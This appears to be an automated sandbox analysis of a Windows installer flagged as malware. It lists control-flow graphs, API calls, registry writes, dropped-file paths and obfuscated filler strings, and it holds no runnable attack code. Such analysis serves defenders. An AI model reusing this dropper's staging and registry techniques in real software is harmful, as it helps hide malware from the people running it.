                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 190 403d08-403d1a 191 403d20-403d26 190->191 192 403e5b-403e6a 190->192 191->192 195 403d2c-403d35 191->195 193 403eb9-403ece 192->193 194 403e6c-403eb4 GetDlgItem * 2 call 4041e1 SetClassLongW call 40140b 192->194 199 403ed0-403ed3 193->199 200 403f0e-403f13 call 40422d 193->200 194->193 196 403d37-403d44 SetWindowPos 195->196 197 403d4a-403d4d 195->197 196->197 201 403d67-403d6d 197->201 202 403d4f-403d61 ShowWindow 197->202 204 403ed5-403ee0 call 401389 199->204 205 403f06-403f08 199->205 212 403f18-403f33 200->212 207 403d89-403d8c 201->207 208 403d6f-403d84 DestroyWindow 201->208 202->201 204->205 227 403ee2-403f01 SendMessageW 204->227 205->200 211 4041ae 205->211 218 403d8e-403d9a SetWindowLongW 207->218 219 403d9f-403da5 207->219 215 40418b-404191 208->215 217 4041b0-4041b7 211->217 213 403f35-403f37 call 40140b 212->213 214 403f3c-403f42 212->214 213->214 223 403f48-403f53 214->223 224 40416c-404185 DestroyWindow EndDialog 214->224 215->211 222 404193-404199 215->222 218->217 225 403e48-403e56 call 404248 219->225 226 403dab-403dbc GetDlgItem 219->226 222->211 228 40419b-4041a4 ShowWindow 222->228 223->224 229 403f59-403fa6 call 40626e call 4041e1 * 3 GetDlgItem 223->229 224->215 225->217 230 403ddb-403dde 226->230 231 403dbe-403dd5 SendMessageW IsWindowEnabled 226->231 227->217 228->211 260 403fb0-403fec ShowWindow KiUserCallbackDispatcher call 404203 EnableWindow 229->260 261 403fa8-403fad 229->261 234 403de0-403de1 230->234 235 403de3-403de6 230->235 231->211 231->230 238 403e11-403e16 call 4041ba 234->238 239 403df4-403df9 235->239 240 403de8-403dee 235->240 238->225 241 403dfb-403e01 239->241 242 403e2f-403e42 SendMessageW 239->242 240->242 245 403df0-403df2 240->245 246 403e03-403e09 call 40140b 241->246 247 403e18-403e21 call 40140b 241->247 242->225 245->238 256 403e0f 246->256 247->225 257 403e23-403e2d 247->257 256->238 257->256 264 403ff1 260->264 265 403fee-403fef 260->265 261->260 266 403ff3-404021 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404023-404034 SendMessageW 266->267 268 404036 266->268 269 40403c-40407b call 404216 call 403ce9 call 40624c lstrlenW call 40626e SetWindowTextW call 401389 267->269 268->269 269->212 280 404081-404083 269->280 280->212 281 404089-40408d 280->281 282 4040ac-4040c0 DestroyWindow 281->282 283 40408f-404095 281->283 282->215 285 4040c6-4040f3 CreateDialogParamW 282->285 283->211 284 40409b-4040a1 283->284 284->212 286 4040a7 284->286 285->215 287 4040f9-404150 call 4041e1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 404152-404165 ShowWindow call 40422d 287->292 294 40416a 292->294 294->215
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                                                            • ShowWindow.USER32(?), ref: 00403D61
                                                                            • DestroyWindow.USER32 ref: 00403D75
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
                                                                            • GetDlgItem.USER32(?,?), ref: 00403DB2
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403E7B
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403E85
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403F96
                                                                            • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
                                                                            • EnableWindow.USER32(?,?), ref: 00403FE4
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FFA
                                                                            • EnableMenuItem.USER32(00000000), ref: 00404001
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                                                            • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                                                            • SetWindowTextW.USER32(?,004236E8), ref: 0040406A
                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                            • String ID: 6B
                                                                            • API String ID: 3282139019-4127139157
                                                                            • Opcode ID: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                                            • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                                                            • Opcode Fuzzy Hash: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                                            • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D

                                                                            Control-flow Graph

                                                                            control_flow_graph for function 0040395A (basic blocks 40395a-403c2f; graph edge list omitted, API calls listed below)
                                                                            APIs
                                                                              • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                              • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                            • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,774D3420,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00000000), ref: 004039DB
                                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
                                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A79
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales), ref: 00403AC2
                                                                              • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                                            • RegisterClassW.USER32(004291A0), ref: 00403AFF
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B4C
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
                                                                            • RegisterClassW.USER32(004291A0), ref: 00403BC4
                                                                            • DialogBoxParamW.USER32(?,00000000,00403D08,00000000), ref: 00403BE3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                            • API String ID: 1975747703-2722336503
                                                                            • Opcode ID: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                                            • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                                                            • Opcode Fuzzy Hash: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                                            • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D

                                                                            Control-flow Graph

                                                                            control_flow_graph for function 00402EC1 (basic blocks 402ec1-4030f7; graph edge list omitted, API calls listed below)
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00402ED2
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                              • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                              • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe", xrefs: 00402EC1
                                                                            • C:\Users\user\Desktop, xrefs: 00402F1C, 00402F21, 00402F27
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402ECB
                                                                            • Inst, xrefs: 00402FA6
                                                                            • Null, xrefs: 00402FB8
                                                                            • Error launching installer, xrefs: 00402F11
                                                                            • soft, xrefs: 00402FAF
                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                            • API String ID: 4283519449-1029440096
                                                                            • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                            • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                                                            • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                            • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD

                                                                            Control-flow Graph

                                                                            control_flow_graph for function 0040626E (basic blocks 40626e-4064dd; graph edge list omitted, API calls listed below)
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063AF
                                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,fusionsenergiens,?,004052E7,fusionsenergiens,00000000), ref: 004063C2
                                                                            • SHGetSpecialFolderLocation.SHELL32(004052E7,00410EA0,00000000,fusionsenergiens,?,004052E7,fusionsenergiens,00000000), ref: 004063FE
                                                                            • SHGetPathFromIDListW.SHELL32(00410EA0,: Completed), ref: 0040640C
                                                                            • CoTaskMemFree.OLE32(00410EA0), ref: 00406417
                                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                                                            • lstrlenW.KERNEL32(: Completed,00000000,fusionsenergiens,?,004052E7,fusionsenergiens,00000000), ref: 00406495
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                            • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$fusionsenergiens
                                                                            • API String ID: 717251189-3063109906
                                                                            • Opcode ID: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                                            • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                                                            • Opcode Fuzzy Hash: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                                            • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E

                                                                            Control-flow Graph

                                                                            control_flow_graph for function 0040176F (basic blocks 40176f-402ace; graph edge list omitted, API calls listed below)
                                                                            APIs
                                                                            • lstrcatW.KERNEL32(00000000,00000000,DllUnregisterServer,C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer,?,?,00000031), ref: 004017B0
                                                                            • CompareFileTime.KERNEL32(-00000014,?,DllUnregisterServer,DllUnregisterServer,00000000,00000000,DllUnregisterServer,C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer,?,?,00000031), ref: 004017D5
                                                                              • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                              • Part of subcall function 004052B0: lstrcatW.KERNEL32(fusionsenergiens,00403233,00403233,fusionsenergiens,00000000,00410EA0,00403094), ref: 0040530B
                                                                              • Part of subcall function 004052B0: SetWindowTextW.USER32(fusionsenergiens,fusionsenergiens), ref: 0040531D
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer$C:\Users\user\AppData\Roaming\kontorarbejders\restbelbenes.dll$C:\Users\user\investeringsbelbenes\redocking.gal$DllUnregisterServer
                                                                            • API String ID: 1941528284-1709933325
                                                                            • Opcode ID: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                                                            • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
                                                                            • Opcode Fuzzy Hash: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                                                            • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D

                                                                            Control-flow Graph

                                                                            • [Figure] Control-flow graph of function 004052B0 (blocks 4052b0-405380); legend: Executed / Not Executed. API calls shown in the graph: lstrlenW, lstrcatW, SetWindowTextW, SendMessageW (three calls).
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                            • lstrlenW.KERNEL32(00403233,fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                            • lstrcatW.KERNEL32(fusionsenergiens,00403233,00403233,fusionsenergiens,00000000,00410EA0,00403094), ref: 0040530B
                                                                            • SetWindowTextW.USER32(fusionsenergiens,fusionsenergiens), ref: 0040531D
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                            • String ID: fusionsenergiens
                                                                            • API String ID: 2531174081-3026270399
                                                                            • Opcode ID: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                                            • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                                                            • Opcode Fuzzy Hash: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                                            • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68

                                                                            Control-flow Graph

                                                                            • [Figure] Control-flow graph of function 004030FA (blocks 4030fa-4032dc); legend: Executed / Not Executed. API calls shown in the graph: GetTickCount (two calls), MulDiv, wsprintfW.
                                                                            Strings
                                                                            • svndrukne bersaglieri fortaelleren resocialiserende.suzannahs prefixally extraordinarily terebellidae reduviids alphabetizer skraldgrinet,nondeadly nebulousness alpinesque arveonkels retailors trichocephaliasis.weepable rekonstrueredes kamtakket slutnumrets kl, xrefs: 00403124
                                                                            • ... %d%%, xrefs: 00403216
                                                                            Similarity
                                                                            • API ID: CountTick$wsprintf
                                                                            • String ID: ... %d%%$svndrukne bersaglieri fortaelleren resocialiserende.suzannahs prefixally extraordinarily terebellidae reduviids alphabetizer skraldgrinet,nondeadly nebulousness alpinesque arveonkels retailors trichocephaliasis.weepable rekonstrueredes kamtakket slutnumrets kl
                                                                            • API String ID: 551687249-3626677696
                                                                            • Opcode ID: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                                                            • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                                                            • Opcode Fuzzy Hash: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                                                            • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9

                                                                            Control-flow Graph

                                                                            • [Figure] Control-flow graph of function 004065B6 (blocks 4065b6-406623); legend: Executed / Not Executed. API calls shown in the graph: GetSystemDirectoryW, wsprintfW, LoadLibraryExW.
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                                                            • wsprintfW.USER32 ref: 00406608
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                            • API String ID: 2200240437-1946221925
                                                                            • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                            • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                                                            • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                            • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8

                                                                            Control-flow Graph

                                                                            • [Figure] Control-flow graph of function 00405D6D (blocks 405d6d-405dbf); legend: Executed / Not Executed. API calls shown in the graph: GetTickCount, GetTempFileNameW.
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00405D8B
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403589), ref: 00405DA6
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe", xrefs: 00405D6D
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D72, 00405D76
                                                                            • nsa, xrefs: 00405D7A
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-758867437
                                                                            • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                            • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                                                            • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                            • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64

                                                                            Control-flow Graph

                                                                            • [Figure] Control-flow graph of function 00401C19 (blocks 401c19-401ce5 and 402abf-402ace); legend: Executed / Not Executed. API calls shown in the graph: FindWindowExW, SendMessageTimeoutW, SendMessageW.
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                            • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                                                            • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                            • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28

                                                                            Control-flow Graph

                                                                            • [Figure] Control-flow graph of function 004023DE (blocks 4023de-402557, 402885-40288c and 402abf-402ace); legend: Executed / Not Executed. API calls shown in the graph: lstrlenW, RegSetValueExW, RegCloseKey.
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(C:\Users\user\investeringsbelbenes\redocking.gal,00000023,00000011,00000002), ref: 00402429
                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\investeringsbelbenes\redocking.gal,00000000,00000011,00000002), ref: 00402469
                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\investeringsbelbenes\redocking.gal,00000000,00000011,00000002), ref: 00402551
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Control-flow Graph (figure not recovered)
                                                                            APIs
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402D98
